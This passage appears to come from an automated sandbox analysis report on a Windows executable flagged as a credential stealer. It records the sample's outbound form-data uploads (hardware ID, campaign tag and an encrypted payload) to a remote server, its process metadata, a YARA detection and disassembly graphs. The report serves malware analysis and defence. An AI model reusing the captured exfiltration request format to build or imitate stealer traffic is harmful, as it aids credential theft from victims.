                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: 2d 2d 48 4f 39 48 51 52 51 46 59 32 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 48 4f 39 48 51 52 51 46 59 32 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 4f 39 48 51 52 51 46 59 32 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 4f 39 48 51 52 51 46
                                                                              Data Ascii: --HO9HQRQFY2M9Content-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--HO9HQRQFY2M9Content-Disposition: form-data; name="pid"1--HO9HQRQFY2M9Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HO9HQRQF
                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: 1f 6d 48 dc 68 c7 ca 45 05 0a 89 c9 4b 23 12 4b 9a 53 6f 16 81 cf 1e aa 01 32 00 07 26 7b 91 ec 0d bf a1 e0 5d 09 ab 37 f4 f2 10 94 fa a8 f0 27 ea 4f b6 1a 82 db 4c 37 72 04 e7 df 25 6a 62 e2 10 5b ef 85 92 4f 33 51 24 d7 2e c5 23 8c 87 b4 ba 31 64 7d 3a 23 8c 8c 0e 9f 2c 1b c3 ac 9a 35 28 52 89 c3 43 75 03 49 63 cc 84 b6 04 8e 67 da 95 05 07 53 3a 3f 47 07 99 28 4c d1 45 f1 43 df d1 d1 a2 f7 8c b6 2f a2 60 1a 34 b6 b8 5d 94 ba 83 9a 56 1f 72 54 80 f0 0e 24 06 ee e1 41 db e8 e9 7f 8d 29 ba 38 1f 3e 2a 0d ba e6 b5 81 9d b6 9e 33 a2 61 12 25 52 bc 14 00 22 fb 69 7f f8 6e 92 8e 45 51 4a aa 89 91 2a f6 8c 79 96 08 75 7a 55 89 c9 8b d6 21 77 d0 c1 38 c4 13 88 62 4a 2f 34 4a be 5c 40 cb fe 98 44 c3 7f 9d 50 e5 b4 a9 66 f1 f8 5a cc c7 60 ed d2 26 1f a6 7e 8b e2
                                                                              Data Ascii: mHhEK#KSo2&{]7'OL7r%jb[O3Q$.#1d}:#,5(RCuIcgS:?G(LEC/`4]VrT$A)8>*3a%R"inEQJ*yuzU!w8bJ/4J\@DPfZ`&~
                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: a7 5b 20 ee 30 3b 06 a2 44 7a 67 40 48 27 12 ad 58 e6 3a 45 c7 16 d6 11 5d 44 98 3d 3f ee 5f 5f 7a 2b b5 ac 68 cd 20 f7 1e 5f c4 b9 83 c1 76 e7 94 20 21 01 99 e1 4e 6a 64 e8 85 2f 73 85 88 e8 0c 34 0a 02 65 67 f6 e6 69 e0 08 42 24 37 8c 94 b0 b3 04 55 0f ce b3 01 52 e1 f0 db 65 b7 1c 5f 01 a3 ac de 33 0a 1a 0a 17 cf 0d 9d 79 e3 b5 bc 7d e5 d4 70 e9 83 99 b2 1b 66 fa 03 79 2f 39 61 3b 2d 73 77 10 ba f7 b3 df 20 e7 fe 5e df 7a fc 39 8c c9 dd 93 a8 d1 4f de 5c 58 39 87 03 0c 97 d7 dc 5a 46 73 eb f4 50 60 b9 d1 6c 29 aa 89 4a 1a 66 20 98 07 7b fc 79 75 e8 d0 2f 57 a3 34 fb be 80 50 c7 81 16 b1 e7 a3 6d 75 d1 df 85 92 67 aa f4 13 f8 de 68 59 66 54 ff 8b 0e bf aa e9 e8 be f1 5d 3a 74 bd 5c 17 eb aa 50 1c c9 e7 c8 ac 8c 7e bf 66 e5 cc 7d 75 56 63 0c f7 de bd 26
                                                                              Data Ascii: [ 0;Dzg@H'X:E]D=?__z+h _v !Njd/s4egiB$7URe_3y}pfy/9a;-sw ^z9O\X9ZFsP`l)Jf {yu/W4PmughYfT]:t\P~f}uVc&
                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: 71 f4 84 4f 0f a9 fa 9d 1b 34 b5 e8 f4 ca 06 14 9d fb dc 19 e2 a7 03 d2 e1 48 73 3f 96 4d 63 46 1a 06 97 29 37 1e 6d df 97 33 67 94 3b 64 dd 7b d5 30 86 f3 72 af b8 e9 51 ec 48 63 49 e8 d4 66 01 91 98 48 34 37 a4 93 6d fb 32 72 e9 d7 e6 0c 72 97 25 ca 9a 77 3f ec 8a 45 bc 36 d7 af c5 86 9d 77 d4 03 24 cc ae c4 a7 99 04 2b cf 28 8c 3a cf 74 ce c9 dc c0 a5 3e 6d 81 ae ec 52 35 a4 26 f1 b9 7e d3 6f ff d1 79 63 2e 4d 07 77 4c 56 af 1d e8 a9 54 c5 d7 56 fb d0 c0 bd a4 93 c5 ab c1 86 bb 8a 52 a4 da 35 af 9a 43 7d 10 a1 46 c2 0c 97 86 60 3c 6f 0c f7 66 71 67 33 06 73 be 7d e2 66 13 b6 b1 31 0f 45 c7 b4 7e cf 5b ee 09 2b bd e8 bd ed 93 a6 2c fe f1 43 d5 e6 4d 5f f1 b1 b4 87 90 7e e9 b6 e7 e9 f4 a7 46 7a 70 c5 25 e4 d3 3d df 15 71 cc d5 93 b0 9b ee b9 d0 ff c2 d1
                                                                              Data Ascii: qO4Hs?McF)7m3g;d{0rQHcIfH47m2rr%w?E6w$+(:t>mR5&~oyc.MwLVTVR5C}F`<ofqg3s}f1E~[+,CM_~Fzp%=q
                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: 66 6d 50 da 4f aa 94 c2 58 4b 0a cd 26 88 76 9b f7 9a 79 3f 63 ce 76 7f 3d 7d f2 95 38 48 f9 34 d0 af 42 29 df d8 43 d7 7f 14 e8 ee d9 b2 6c 50 38 f0 61 a8 47 47 f6 cc 40 60 7f c8 ed c3 3c 18 ee cd a3 92 33 6b 09 09 1c 89 d4 7c f9 5d bb b8 c0 1e 25 0c 43 61 65 fa 20 5b 55 8d ea f0 62 be 4a f7 19 4f 52 ea d7 c7 5b 19 fb 9c f0 f9 09 f9 f1 5f 65 09 0b 92 f3 25 b5 fd bb f8 7f c9 c7 04 d2 0d 59 b1 f5 5b 73 3e c4 87 0b 89 f1 46 35 46 1e e8 8e ae bc 94 79 17 19 24 81 3d f7 25 ad c6 40 57 2a b1 d9 c0 76 a6 fa 59 68 32 1a 89 6b 1e f6 6f 2c 32 c1 a4 e7 6f 84 9b c9 85 ca ad 71 73 4d ae 17 7c 95 0b ba 75 f6 79 84 87 5e d7 87 d7 70 02 5d b9 fd 9d db 48 05 c6 9d b0 b6 7e 2a bf e1 52 f0 9d 90 f4 b9 eb 6d 2a af 6e 1a d8 09 ca bd f9 9e d0 7c 3c 19 ed 59 48 51 1d 3d 1c a1
                                                                              Data Ascii: fmPOXK&vy?cv=}8H4B)ClP8aGG@`<3k|]%Cae [UbJOR[_e%Y[s>F5Fy$=%@W*vYh2ko,2oqsM|uy^p]H~*Rm*n|<YHQ=
                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: 3f 89 0e 80 f4 18 87 58 89 ea ed 22 d4 d3 b7 1b 9f c7 53 24 1d 67 f9 c0 c1 c6 e9 3f 29 47 88 48 b6 46 60 49 3a fa f7 fc 67 02 8b 00 73 97 9d 83 fe 85 f4 84 c4 bc 1c 46 38 b5 a5 74 cb a7 02 2f 74 31 65 55 ec 3e a6 2c 6d f9 59 43 29 49 4e 86 36 c5 75 7e 7f 7a 29 24 38 cd 67 68 20 c5 e1 0b 35 d2 44 ab 72 f9 8b ce 28 0a ef 59 6f 0b e4 81 86 84 46 75 ec 76 a6 fc 78 a2 4a 2b ce 63 e0 72 ab 75 84 cf 65 56 3e 9b b8 f9 0e eb 42 1e b6 0b bd 6b 02 a5 07 17 e5 1a da a2 8c 76 d4 45 d4 35 08 85 d1 20 07 55 e9 36 2c 09 1c e5 18 f9 a7 ca d5 ea 17 42 16 f8 f4 73 d9 d1 c7 4a b7 c1 12 63 7d 44 36 57 fe 40 36 29 d1 9c ac c1 bb 6c 6f f4 b5 fe 1e 53 bb 78 7c a4 54 91 e5 dd 5c 21 3e 5a 2d e1 3a 24 77 15 4a 6f e6 6e 77 31 d2 8b f9 68 8f a2 f4 b9 48 d2 a0 89 b3 d1 72 4c 30 31 96
                                                                              Data Ascii: ?X"S$g?)GHF`I:gsF8t/t1eU>,mYC)IN6u~z)$8gh 5Dr(YoFuvxJ+crueV>BkvE5 U6,BsJc}D6W@6)loSx|T\!>Z-:$wJonw1hHrL01
                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: 99 6b f1 87 7a ec 5b 7e 39 8f 79 3e 0d 49 52 00 b1 6d 15 73 39 53 6f 5d b9 1f 90 5c 97 8a 1f 47 29 5e a0 ef bb 8e e9 c6 bd 18 ff f0 57 d0 c6 05 c0 7c bb 10 51 be 35 be 91 27 e2 43 3b 33 ad 1f e8 d9 9d 61 bc 33 dc bb 69 f5 5b 3e e6 4f c1 11 cc d2 a3 5c ff b1 2b 19 e6 62 ae 3b df 4f 17 6b 8a bb 3d c6 0e c4 41 c8 a1 10 a9 b9 7f 6e 9f 94 7a e9 4b c0 20 47 6e d8 eb 41 8e ba f3 ad 84 da 93 e9 a9 22 66 82 ac c2 91 89 09 01 35 bd d6 24 94 fd 1d ae f5 89 43 15 ff 67 42 e4 56 67 bc 2b 62 74 17 f4 54 ee f6 10 5e 89 63 d3 2e fd c6 15 4c b5 bf e8 d0 b4 f9 d6 6e 7a 1f a2 84 65 17 b9 82 66 2b 7f c9 a6 91 6c d0 11 4d 40 c3 28 f2 39 45 a0 fe 5f 10 c6 fa d7 91 18 9f 5f d2 fe 2e 83 ed 86 0b fc 21 52 fb 09 56 4f 63 65 91 65 5e 00 96 00 f8 5f f3 9d cd 9a 13 60 3a 82 10 84 68
                                                                              Data Ascii: kz[~9y>IRms9So]\G)^W|Q5'C;3a3i[>O\+b;Ok=AnzK GnA"f5$CgBVg+btT^c.Lnzef+lM@(9E__.!RVOcee^_`:h
                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: 58 76 9b 84 65 e5 67 04 fa 29 0f ca bd 3b d2 80 20 3c dc da 5e e2 32 6f 4e 68 f5 4a 79 db 6d 4e 0d 15 2e 8a 89 ce 9b bc ff 9e 14 31 eb a2 cb 3a 4d e6 84 72 c9 25 11 cc c2 e2 5b 93 13 fc 21 98 d1 c7 6b 7a c8 9f 41 1f db b5 4f 45 74 d6 eb e6 8d 52 93 bc be c5 94 f5 c7 cf 63 d7 ec b4 d9 58 e6 07 f9 86 63 31 ef 5c 2d 67 75 cd 4d d1 e4 e7 9c 8c 77 db a2 c6 1b d9 54 b1 35 38 00 0e e2 65 07 c4 0f 7d 2b b8 29 a1 b8 11 8e 41 32 62 ca 53 69 6e 73 69 8e 08 a7 cb 3b d3 f6 13 da 44 3f 04 a0 3a cb b5 2c b5 0c 38 aa 06 88 3f 88 06 59 82 09 cd c4 dc 58 63 0d db 46 10 05 ca 41 e0 d5 84 eb 63 7e cf 44 c3 1b 77 09 3e fc 3d 95 b0 51 96 97 b0 75 dc 8e b1 79 39 53 d6 23 92 9d 34 91 4d f3 aa 8f 54 63 27 ec a7 a1 50 da df a8 70 d4 1b d2 ee c6 30 fd a5 e4 6f 54 75 76 47 73 51 e1
                                                                              Data Ascii: Xveg); <^2oNhJymN.1:Mr%[!kzAOEtRcXc1\-guMwT58e}+)A2bSinsi;D?:,8?YXcFAc~Dw>=Quy9S#4MTc'Pp0oTuvGsQ
                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: 2d 2a 38 58 96 0c 7a 42 9d 30 fb 32 a1 18 36 ae e2 02 86 9e 60 f1 a0 90 53 3a ba 43 f0 80 1b 25 fc e6 23 8f 0f 4e b1 0b db f0 22 0a 61 8e fc 2c 33 87 fa d2 e0 a9 5b a8 0d 55 a3 6d 7f a1 0d 48 e4 46 92 47 18 1a c4 aa f0 44 74 86 98 d5 b5 d3 56 95 ea 97 2f 45 29 a9 54 93 56 a0 5f 66 e9 33 b9 f7 5c 67 44 ba 82 89 71 11 b1 71 b1 77 0e ab c9 3b c5 8a cd 4a 2e 21 04 a7 2c 8b e3 3d 06 03 32 b2 71 3b 98 9d 3a e9 f5 3a 11 67 2f 51 fb 11 05 ed fd 38 6f 0f be e9 9f 6f 56 e8 3b 96 b5 92 ad cd 0c 05 6d 27 b1 d3 2e af 71 3b ab d8 d8 65 89 bf ef 96 2d d6 de 1e 12 6f f5 88 4b 60 ed 1e 55 2c 14 1c 0e 71 e7 7d 36 2b e0 2f 96 83 1f dc c6 f4 17 45 f0 c4 0a 0d ff f2 9d 9b a3 44 dd 4f ca b4 fc 87 94 14 a2 cd f3 ba 3b 92 9d 66 cd 97 c4 7c 44 6f d5 7d aa c5 ae ab 2f f3 24 31 cb
                                                                              Data Ascii: -*8XzB026`S:C%#N"a,3[UmHFGDtV/E)TV_f3\gDqqw;J.!,=2q;::g/Q8ooV;m'.q;e-oK`U,q}6+/EDO;f|Do}/$1
                                                                              2024-11-24 13:56:33 UTC15331OUTData Raw: e3 87 8f 59 fd 64 18 a3 fc 59 9a 2c d6 03 7f fc 48 b4 21 e9 f3 61 dd f7 83 0b 9a 89 a7 47 4b b2 16 b5 18 8f b1 88 3f e2 83 4e 0d b7 a8 cb 7d 47 2e 34 db 5f de 4f 4f 05 75 8a 5e 10 3c f4 28 a1 55 12 e8 5d 38 c5 07 1e c9 87 1b f2 83 59 87 bf df 47 ef a0 79 eb 51 4f 16 78 42 ae e5 b4 f6 36 d9 82 27 fc 79 c5 45 db 70 ad a5 98 10 24 e0 87 f2 79 ee 26 d6 df f9 2a fb fb 4a ae 30 cd 6d 08 10 82 30 e7 21 0b 34 7c 8e 5d cf 21 5b 5a 46 e8 56 71 f1 34 9e 1e 1e dd 28 c1 d9 3a c6 48 32 0e 4c e7 d3 6c 54 68 95 79 9a 66 f8 d5 51 91 58 f3 82 be fa ca ed db c3 0f 7c 6c b7 30 16 04 fc 1b d8 bf 58 ae ea fc 1f 03 28 bb 4d e0 c5 53 9b 97 01 dc 29 d0 b0 c1 c4 90 b7 e1 dd d2 90 56 f1 d9 23 cf 63 44 eb 8c f1 4a 34 e2 89 4f ba b7 19 45 e0 96 a2 b5 62 b0 97 2d a0 c4 8f 28 c2 4a 87
                                                                              Data Ascii: YdY,H!aGK?N}G.4_OOu^<(U]8YGyQOxB6'yEp$y&*J0m0!4|]![ZFVq4(:H2LlThyfQX|l0X(MS)V#cDJ4OEb-(J
                                                                              2024-11-24 13:56:36 UTC1026INHTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=lb46jnbgtfh9gmh0ios6lfqb1c; expires=Thu, 20-Mar-2025 07:43:13 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJ%2FOzv3Dp5i7fdtKnlM%2BStNx0gc638w2D6r1AdoNWSpRBoNpA56o%2By0h5wTk9edrUm8szamkYg%2FMn5nEEGyNIF2UEMREDRUVuZw3at6oGRq%2B8CC1moi3jNzLtGmwP26Qwe%2FA5j8%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e72ccb5c4392-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1853&sent=193&recv=571&lost=0&retrans=1&sent_bytes=4228&recv_bytes=552768&delivery_rate=146241&cwnd=232&unsent_bytes=0&cid=4808db1f4de33796&ts=3773&x=0"


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:08:56:14
                                                                              Start date:24/11/2024
                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                              Imagebase:0xbb0000
                                                                              File size:1'865'728 bytes
                                                                              MD5 hash:5E1EE83DF7FD0F85791575EED5ABFFA8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1420219520.000000000155F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:65.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:100%
                                                                                Total number of Nodes:17
                                                                                Total number of Limit Nodes:0
                                                                                execution_graph 699 bbe35b 700 bbe361 699->700 701 bbe370 CoUninitialize 700->701 702 bbe3a0 701->702 702->702 713 bb89a0 715 bb89af 713->715 714 bb8cb3 ExitProcess 715->714 703 be9030 704 be9090 703->704 705 be91b1 SysAllocString 704->705 709 be966a 704->709 707 be91df 705->707 706 be969c GetVolumeInformationW 712 be96ba 706->712 708 be91ea CoSetProxyBlanket 707->708 707->709 708->709 711 be920a 708->711 709->706 710 be9658 SysFreeString SysFreeString 710->709 711->710

                                                                                Callgraph

                                                                                Executed Functions

                                                                                Function 00BE9030 Relevance: 21.6, APIs: 5, Strings: 7, Instructions: 629memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 be9030-be9089 1 be9090-be90c6 0->1 1->1 2 be90c8-be90e4 1->2 4 be90e6 2->4 5 be90f1-be913f 2->5 4->5 7 be968c-be96b8 call bef9a0 GetVolumeInformationW 5->7 8 be9145-be9177 5->8 13 be96bc-be96df call bd0650 7->13 14 be96ba 7->14 9 be9180-be91af 8->9 9->9 11 be91b1-be91e4 SysAllocString 9->11 18 be91ea-be9204 CoSetProxyBlanket 11->18 19 be9674-be9688 11->19 20 be96e0-be96e8 13->20 14->13 21 be966a-be9670 18->21 22 be920a-be9225 18->22 19->7 20->20 23 be96ea-be96ec 20->23 21->19 25 be9230-be9262 22->25 26 be96fe-be972d call bd0650 23->26 27 be96ee-be96fb call bb8330 23->27 25->25 28 be9264-be92df 25->28 36 be9730-be9738 26->36 27->26 35 be92e0-be930b 28->35 35->35 37 be930d-be933d 35->37 36->36 38 be973a-be973c 36->38 49 be9658-be9668 SysFreeString * 2 37->49 50 be9343-be9365 37->50 39 be974e-be977d call bd0650 38->39 40 be973e-be974b call bb8330 38->40 46 be9780-be9788 39->46 40->39 46->46 48 be978a-be978c 46->48 51 be979e-be97cb call bd0650 48->51 52 be978e-be979b call bb8330 48->52 49->21 57 be964b-be9655 50->57 58 be936b-be936e 50->58 61 be97d0-be97d8 51->61 52->51 57->49 58->57 60 be9374-be9379 58->60 60->57 63 be937f-be93cf 60->63 61->61 64 be97da-be97dc 61->64 70 be93d0-be9416 63->70 65 be97ee-be97f5 64->65 66 be97de-be97eb call bb8330 64->66 66->65 70->70 71 be9418-be942d 70->71 72 be9431-be9433 71->72 73 be9439-be943f 72->73 74 be9636-be9647 72->74 73->74 75 be9445-be9452 73->75 74->57 76 be948d 75->76 77 be9454-be9459 75->77 80 be948f-be94b7 call bb82b0 76->80 79 be946c-be9470 77->79 82 be9472-be947b 79->82 83 be9460 79->83 89 be94bd-be94cb 80->89 90 be95e8-be95f9 80->90 87 be947d-be9480 82->87 88 be9482-be9486 82->88 86 be9461-be946a 83->86 86->79 86->80 87->86 88->86 91 be9488-be948b 88->91 89->90 92 be94d1-be94d5 89->92 93 be95fb 90->93 94 be9600-be960c 90->94 91->86 95 be94e0-be94ea 92->95 93->94 96 be960e 94->96 97 be9613-be9633 call bb82e0 call bb82c0 94->97 98 be94ec-be94f1 95->98 99 be9500-be9506 95->99 96->97 97->74 101 be9590-be9596 98->101 102 be9508-be950b 99->102 103 be9525-be9533 99->103 109 be9598-be959e 101->109 102->103 105 be950d-be9523 102->105 106 be95aa-be95b3 103->106 107 be9535-be9538 103->107 105->101 110 be95b9-be95bc 106->110 111 be95b5-be95b7 106->111 107->106 112 be953a-be9581 107->112 109->90 114 be95a0-be95a2 109->114 115 be95be-be95e2 110->115 116 be95e4-be95e6 110->116 111->109 112->101 114->95 117 be95a8 114->117 115->101 116->101 117->90
                                                                                APIs
                                                                                • SysAllocString.OLEAUT32(13C511C2), ref: 00BE91B7
                                                                                • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00BE91FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: AllocBlanketProxyString
                                                                                • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                                                                • API String ID: 900851650-4011188741
                                                                                • Opcode ID: 13276b3832c0cc1b3db4dc6c83daf30e64b29b2161ea3213546a9edb9a22defe
                                                                                • Instruction ID: 812934fdc0cace81acf7e042fcb9aa46bcb92a7272f98943605fd3589540ca49
                                                                                • Opcode Fuzzy Hash: 13276b3832c0cc1b3db4dc6c83daf30e64b29b2161ea3213546a9edb9a22defe
                                                                                • Instruction Fuzzy Hash: 8D2241B1908340AFE724CF21C881B6BBBE6EF95314F148A5CF4959B2C1E774D909CB92
                                                                                Function 00BB98F0 Relevance: 11.7, Strings: 9, Instructions: 428COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 118 bb98f0-bb98fe 119 bb9e75 118->119 120 bb9904-bb997f call bb61a0 call bb82b0 118->120 121 bb9e77-bb9e83 119->121 126 bb9980-bb99b5 120->126 126->126 127 bb99b7-bb99df call bb9210 126->127 130 bb99e0-bb9a5b 127->130 130->130 131 bb9a5d-bb9a99 call bb9210 130->131 134 bb9aa0-bb9ae1 131->134 134->134 135 bb9ae3-bb9b2f call bb9210 134->135 138 bb9b30-bb9b56 135->138 138->138 139 bb9b58-bb9b6f 138->139 140 bb9b70-bb9bdc 139->140 140->140 141 bb9bde-bb9c0e call bb9210 140->141 144 bb9c10-bb9c6e 141->144 144->144 145 bb9c70-bb9d4b call bb94d0 144->145 148 bb9d50-bb9d7e 145->148 148->148 149 bb9d80-bb9d88 148->149 150 bb9d8a-bb9d92 149->150 151 bb9db1-bb9dbc 149->151 152 bb9da0-bb9daf 150->152 153 bb9dbe-bb9dc1 151->153 154 bb9de1-bb9e0b 151->154 152->151 152->152 155 bb9dd0-bb9ddf 153->155 156 bb9e10-bb9e36 154->156 155->154 155->155 156->156 157 bb9e38-bb9e58 call bbc570 call bb82c0 156->157 161 bb9e5d-bb9e73 157->161 161->121
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 12251195FFE4CC48D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                                                                • API String ID: 0-2550068365
                                                                                • Opcode ID: 777b4c0024700c20e20fdf46af0251161334463b8d97d9f3456e1fedfac927ac
                                                                                • Instruction ID: 38b14772116d2dde5c9464fc8814a07492679ea5fb6dea930335fbef4f9ff39c
                                                                                • Opcode Fuzzy Hash: 777b4c0024700c20e20fdf46af0251161334463b8d97d9f3456e1fedfac927ac
                                                                                • Instruction Fuzzy Hash: BFE16C72A483504BD328CF35C8513ABBBE6EBD1314F198A6DE5E58B391DB78C805CB42
                                                                                Function 00BBE35B Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 295COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 162 bbe35b-bbe393 call be4600 call bb98f0 CoUninitialize 167 bbe3a0-bbe3d2 162->167 167->167 168 bbe3d4-bbe3ef 167->168 169 bbe3f0-bbe428 168->169 169->169 170 bbe42a-bbe499 169->170 171 bbe4a0-bbe4ba 170->171 171->171 172 bbe4bc-bbe4cd 171->172 173 bbe4eb-bbe4f3 172->173 174 bbe4cf-bbe4df 172->174 176 bbe50b-bbe515 173->176 177 bbe4f5-bbe4f6 173->177 175 bbe4e0-bbe4e9 174->175 175->173 175->175 179 bbe52b-bbe533 176->179 180 bbe517-bbe51b 176->180 178 bbe500-bbe509 177->178 178->176 178->178 182 bbe54b-bbe555 179->182 183 bbe535-bbe536 179->183 181 bbe520-bbe529 180->181 181->179 181->181 185 bbe56b-bbe577 182->185 186 bbe557-bbe55b 182->186 184 bbe540-bbe549 183->184 184->182 184->184 188 bbe579-bbe57b 185->188 189 bbe591-bbe6b3 185->189 187 bbe560-bbe569 186->187 187->185 187->187 190 bbe580-bbe58d 188->190 191 bbe6c0-bbe6da 189->191 190->190 193 bbe58f 190->193 191->191 192 bbe6dc-bbe70f 191->192 194 bbe710-bbe72b 192->194 193->189 194->194 195 bbe72d-bbe757 call bbb960 194->195 197 bbe75c-bbe77d 195->197
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmpDownload File
